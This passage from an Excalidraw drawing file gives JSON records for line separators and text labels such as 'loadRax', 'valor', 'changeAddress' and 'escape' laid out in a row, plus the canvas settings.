					0,
					0
				],
				[
					0,
					46.17428763085621
				]
			]
		},
		{
			"type": "line",
			"version": 1405,
			"versionNonce": 623539416,
			"isDeleted": false,
			"id": "IGfedt_lEGg39FpzBz08i",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -795.1454062468573,
			"y": 459.00269763317874,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 0,
			"height": 46.17428763085621,
			"seed": 1825016536,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1727618562433,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": null,
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": null,
			"points": [
				[
					0,
					0
				],
				[
					0,
					46.17428763085621
				]
			]
		},
		{
			"type": "line",
			"version": 1479,
			"versionNonce": 1887823016,
			"isDeleted": false,
			"id": "GVrg7nxG-vqKt2fy_xetr",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -749.641648420168,
			"y": 458.314399230512,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 0,
			"height": 46.17428763085621,
			"seed": 1954755496,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1727618562433,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": null,
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": null,
			"points": [
				[
					0,
					0
				],
				[
					0,
					46.17428763085621
				]
			]
		},
		{
			"type": "line",
			"version": 1454,
			"versionNonce": 783686104,
			"isDeleted": false,
			"id": "jOvtcoff49JxFGqb2QJfq",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -635.2475724507801,
			"y": 459.0328463989781,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 0,
			"height": 46.17428763085621,
			"seed": 674135720,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1727618562433,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": null,
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": null,
			"points": [
				[
					0,
					0
				],
				[
					0,
					46.17428763085621
				]
			]
		},
		{
			"type": "line",
			"version": 1379,
			"versionNonce": 1387466664,
			"isDeleted": false,
			"id": "Tx3zzv7vDfNnYB1Zays5K",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -575.8762278309317,
			"y": 458.3984576088295,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 0,
			"height": 46.17428763085621,
			"seed": 1359452888,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1727618562433,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": null,
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": null,
			"points": [
				[
					0,
					0
				],
				[
					0,
					46.17428763085621
				]
			]
		},
		{
			"type": "line",
			"version": 1460,
			"versionNonce": 830807768,
			"isDeleted": false,
			"id": "goeK6NojYFPgEJhzRYBbj",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -530.9323496553956,
			"y": 457.5574535648104,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 0,
			"height": 46.17428763085621,
			"seed": 1878949848,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1727618562433,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": null,
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": null,
			"points": [
				[
					0,
					0
				],
				[
					0,
					46.17428763085621
				]
			]
		},
		{
			"type": "line",
			"version": 1584,
			"versionNonce": 1812126376,
			"isDeleted": false,
			"id": "ulE0habLfV5ZkIfA-i8JY",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -422.4878634400171,
			"y": 457.193839908091,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 0,
			"height": 46.17428763085621,
			"seed": 953205976,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1727618562433,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": null,
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": null,
			"points": [
				[
					0,
					0
				],
				[
					0,
					46.17428763085621
				]
			]
		},
		{
			"type": "line",
			"version": 1559,
			"versionNonce": 1848345560,
			"isDeleted": false,
			"id": "QWSu_BLPnMLYZ_kUNuLEm",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -376.7751496626704,
			"y": 456.35280529256374,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 0,
			"height": 46.17428763085621,
			"seed": 420637144,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1727618562433,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": null,
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": null,
			"points": [
				[
					0,
					0
				],
				[
					0,
					46.17428763085621
				]
			]
		},
		{
			"type": "line",
			"version": 1676,
			"versionNonce": 2132886952,
			"isDeleted": false,
			"id": "UPrRtzNKYY4xh9nMHgs5W",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -260.51113058326064,
			"y": 456.47675461659543,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 0,
			"height": 46.17428763085621,
			"seed": 735538904,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1727618562433,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": null,
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": null,
			"points": [
				[
					0,
					0
				],
				[
					0,
					46.17428763085621
				]
			]
		},
		{
			"type": "text",
			"version": 1305,
			"versionNonce": 1925007576,
			"isDeleted": false,
			"id": "zT1t1cxj",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -1007.369950770937,
			"y": 474.9930581021753,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 55.53515625,
			"height": 16.248897316172272,
			"seed": 13805528,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727618562433,
			"link": null,
			"locked": false,
			"fontSize": 13.540747763476894,
			"fontFamily": 3,
			"text": "loadRax",
			"rawText": "loadRax",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "loadRax",
			"lineHeight": 1.2,
			"baseline": 13
		},
		{
			"type": "text",
			"version": 1711,
			"versionNonce": 423252136,
			"isDeleted": false,
			"id": "rK9tiNaY",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -634.013353967073,
			"y": 474.2086169091772,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 55.53515624999999,
			"height": 16.24889731617227,
			"seed": 639837144,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727618562433,
			"link": null,
			"locked": false,
			"fontSize": 13.540747763476892,
			"fontFamily": 3,
			"text": "loadRax",
			"rawText": "loadRax",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "loadRax",
			"lineHeight": 1.2,
			"baseline": 13
		},
		{
			"type": "text",
			"version": 1824,
			"versionNonce": 1791913432,
			"isDeleted": false,
			"id": "oTEySyzq",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -528.8463002911324,
			"y": 472.3920598978678,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 103.13671875,
			"height": 16.248897316172272,
			"seed": 549055656,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727618562433,
			"link": null,
			"locked": false,
			"fontSize": 13.540747763476894,
			"fontFamily": 3,
			"text": "ChangeAddress",
			"rawText": "ChangeAddress",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "ChangeAddress",
			"lineHeight": 1.2,
			"baseline": 13
		},
		{
			"type": "text",
			"version": 2079,
			"versionNonce": 1106901928,
			"isDeleted": false,
			"id": "C0jDoSMf",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -372.8112417885119,
			"y": 472.9038045728833,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 111.0703125,
			"height": 16.24889731617227,
			"seed": 367874728,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727618562433,
			"link": null,
			"locked": false,
			"fontSize": 13.540747763476892,
			"fontFamily": 3,
			"text": "loadRaxAddress",
			"rawText": "loadRaxAddress",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "loadRaxAddress",
			"lineHeight": 1.2,
			"baseline": 13
		},
		{
			"type": "text",
			"version": 1943,
			"versionNonce": 1869804248,
			"isDeleted": false,
			"id": "p1g8zYWA",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -253.98992445053386,
			"y": 475.83572966039685,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 47.6015625,
			"height": 16.248897316172272,
			"seed": 1886329256,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727618562433,
			"link": null,
			"locked": false,
			"fontSize": 13.540747763476894,
			"fontFamily": 3,
			"text": "escape",
			"rawText": "escape",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "escape",
			"lineHeight": 1.2,
			"baseline": 13
		},
		{
			"type": "text",
			"version": 1767,
			"versionNonce": 730613416,
			"isDeleted": false,
			"id": "b50GcHo1",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -573.2628414765745,
			"y": 473.82963750192334,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 39.66796875,
			"height": 16.24889731617227,
			"seed": 413650392,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727618562433,
			"link": null,
			"locked": false,
			"fontSize": 13.540747763476892,
			"fontFamily": 3,
			"text": "valor",
			"rawText": "valor",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "valor",
			"lineHeight": 1.2,
			"baseline": 13
		},
		{
			"type": "text",
			"version": 1804,
			"versionNonce": 1463736280,
			"isDeleted": false,
			"id": "IUSepiRB",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -419.2040527899188,
			"y": 472.459675993065,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 39.66796875,
			"height": 16.24889731617227,
			"seed": 865816488,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727618562433,
			"link": null,
			"locked": false,
			"fontSize": 13.540747763476892,
			"fontFamily": 3,
			"text": "valor",
			"rawText": "valor",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "valor",
			"lineHeight": 1.2,
			"baseline": 13
		},
		{
			"type": "text",
			"version": 1958,
			"versionNonce": 1654469032,
			"isDeleted": false,
			"id": "OaSWXSV5",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -899.5692306962724,
			"y": 475.3369997496505,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 103.13671875,
			"height": 16.24889731617227,
			"seed": 1569815000,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727618562433,
			"link": null,
			"locked": false,
			"fontSize": 13.540747763476892,
			"fontFamily": 3,
			"text": "changeAddress",
			"rawText": "changeAddress",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "changeAddress",
			"lineHeight": 1.2,
			"baseline": 13
		},
		{
			"type": "text",
			"version": 2218,
			"versionNonce": 105258200,
			"isDeleted": false,
			"id": "0Guu3g33",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -747.8226704640007,
			"y": 475.84875929669494,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 111.0703125,
			"height": 16.24889731617227,
			"seed": 770997976,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727618562433,
			"link": null,
			"locked": false,
			"fontSize": 13.540747763476892,
			"fontFamily": 3,
			"text": "loadRaxAddress",
			"rawText": "loadRaxAddress",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "loadRaxAddress",
			"lineHeight": 1.2,
			"baseline": 13
		},
		{
			"type": "text",
			"version": 1856,
			"versionNonce": 2119744680,
			"isDeleted": false,
			"id": "0JUsJMTG",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -946.7148784276939,
			"y": 476.3847368586282,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 39.66796875,
			"height": 16.24889731617227,
			"seed": 1705960408,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727618562433,
			"link": null,
			"locked": false,
			"fontSize": 13.540747763476892,
			"fontFamily": 3,
			"text": "valor",
			"rawText": "valor",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "valor",
			"lineHeight": 1.2,
			"baseline": 13
		},
		{
			"type": "text",
			"version": 1974,
			"versionNonce": 1042072024,
			"isDeleted": false,
			"id": "5oG2SJNL",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -791.8763790068244,
			"y": 476.1843711951483,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 39.66796875000001,
			"height": 16.248897316172272,
			"seed": 1658104024,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727618562433,
			"link": null,
			"locked": false,
			"fontSize": 13.540747763476894,
			"fontFamily": 3,
			"text": "valor",
			"rawText": "valor",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "valor",
			"lineHeight": 1.2,
			"baseline": 13
		}
	],
	"appState": {
		"theme": "light",
		"viewBackgroundColor": "#ffffff",
		"currentItemStrokeColor": "#1e1e1e",
		"currentItemBackgroundColor": "transparent",
		"currentItemFillStyle": "solid",
		"currentItemStrokeWidth": 2,
		"currentItemStrokeStyle": "solid",
		"currentItemRoughness": 1,
		"currentItemOpacity": 100,
		"currentItemFontFamily": 1,
		"currentItemFontSize": 16,
		"currentItemTextAlign": "left",
		"currentItemStartArrowhead": null,
		"currentItemEndArrowhead": "arrow",
		"scrollX": 3855.5521835049385,
		"scrollY": 1590.910565243343,
		"zoom": {
			"value": 0.2
		},
		"currentItemRoundness": "round",
		"gridSize": null,
		"gridColor": {
			"Bold": "#C9C9C9FF",
			"Regular": "#EDEDEDFF"
		},
		"currentStrokeOptions": null,
		"previousGridSize": null,
		"frameRendering": {
			"enabled": true,
			"clip": true,
			"name": true,
			"outline": true
		}
	},
	"prevTextMode": "parsed",
	"files": {}
}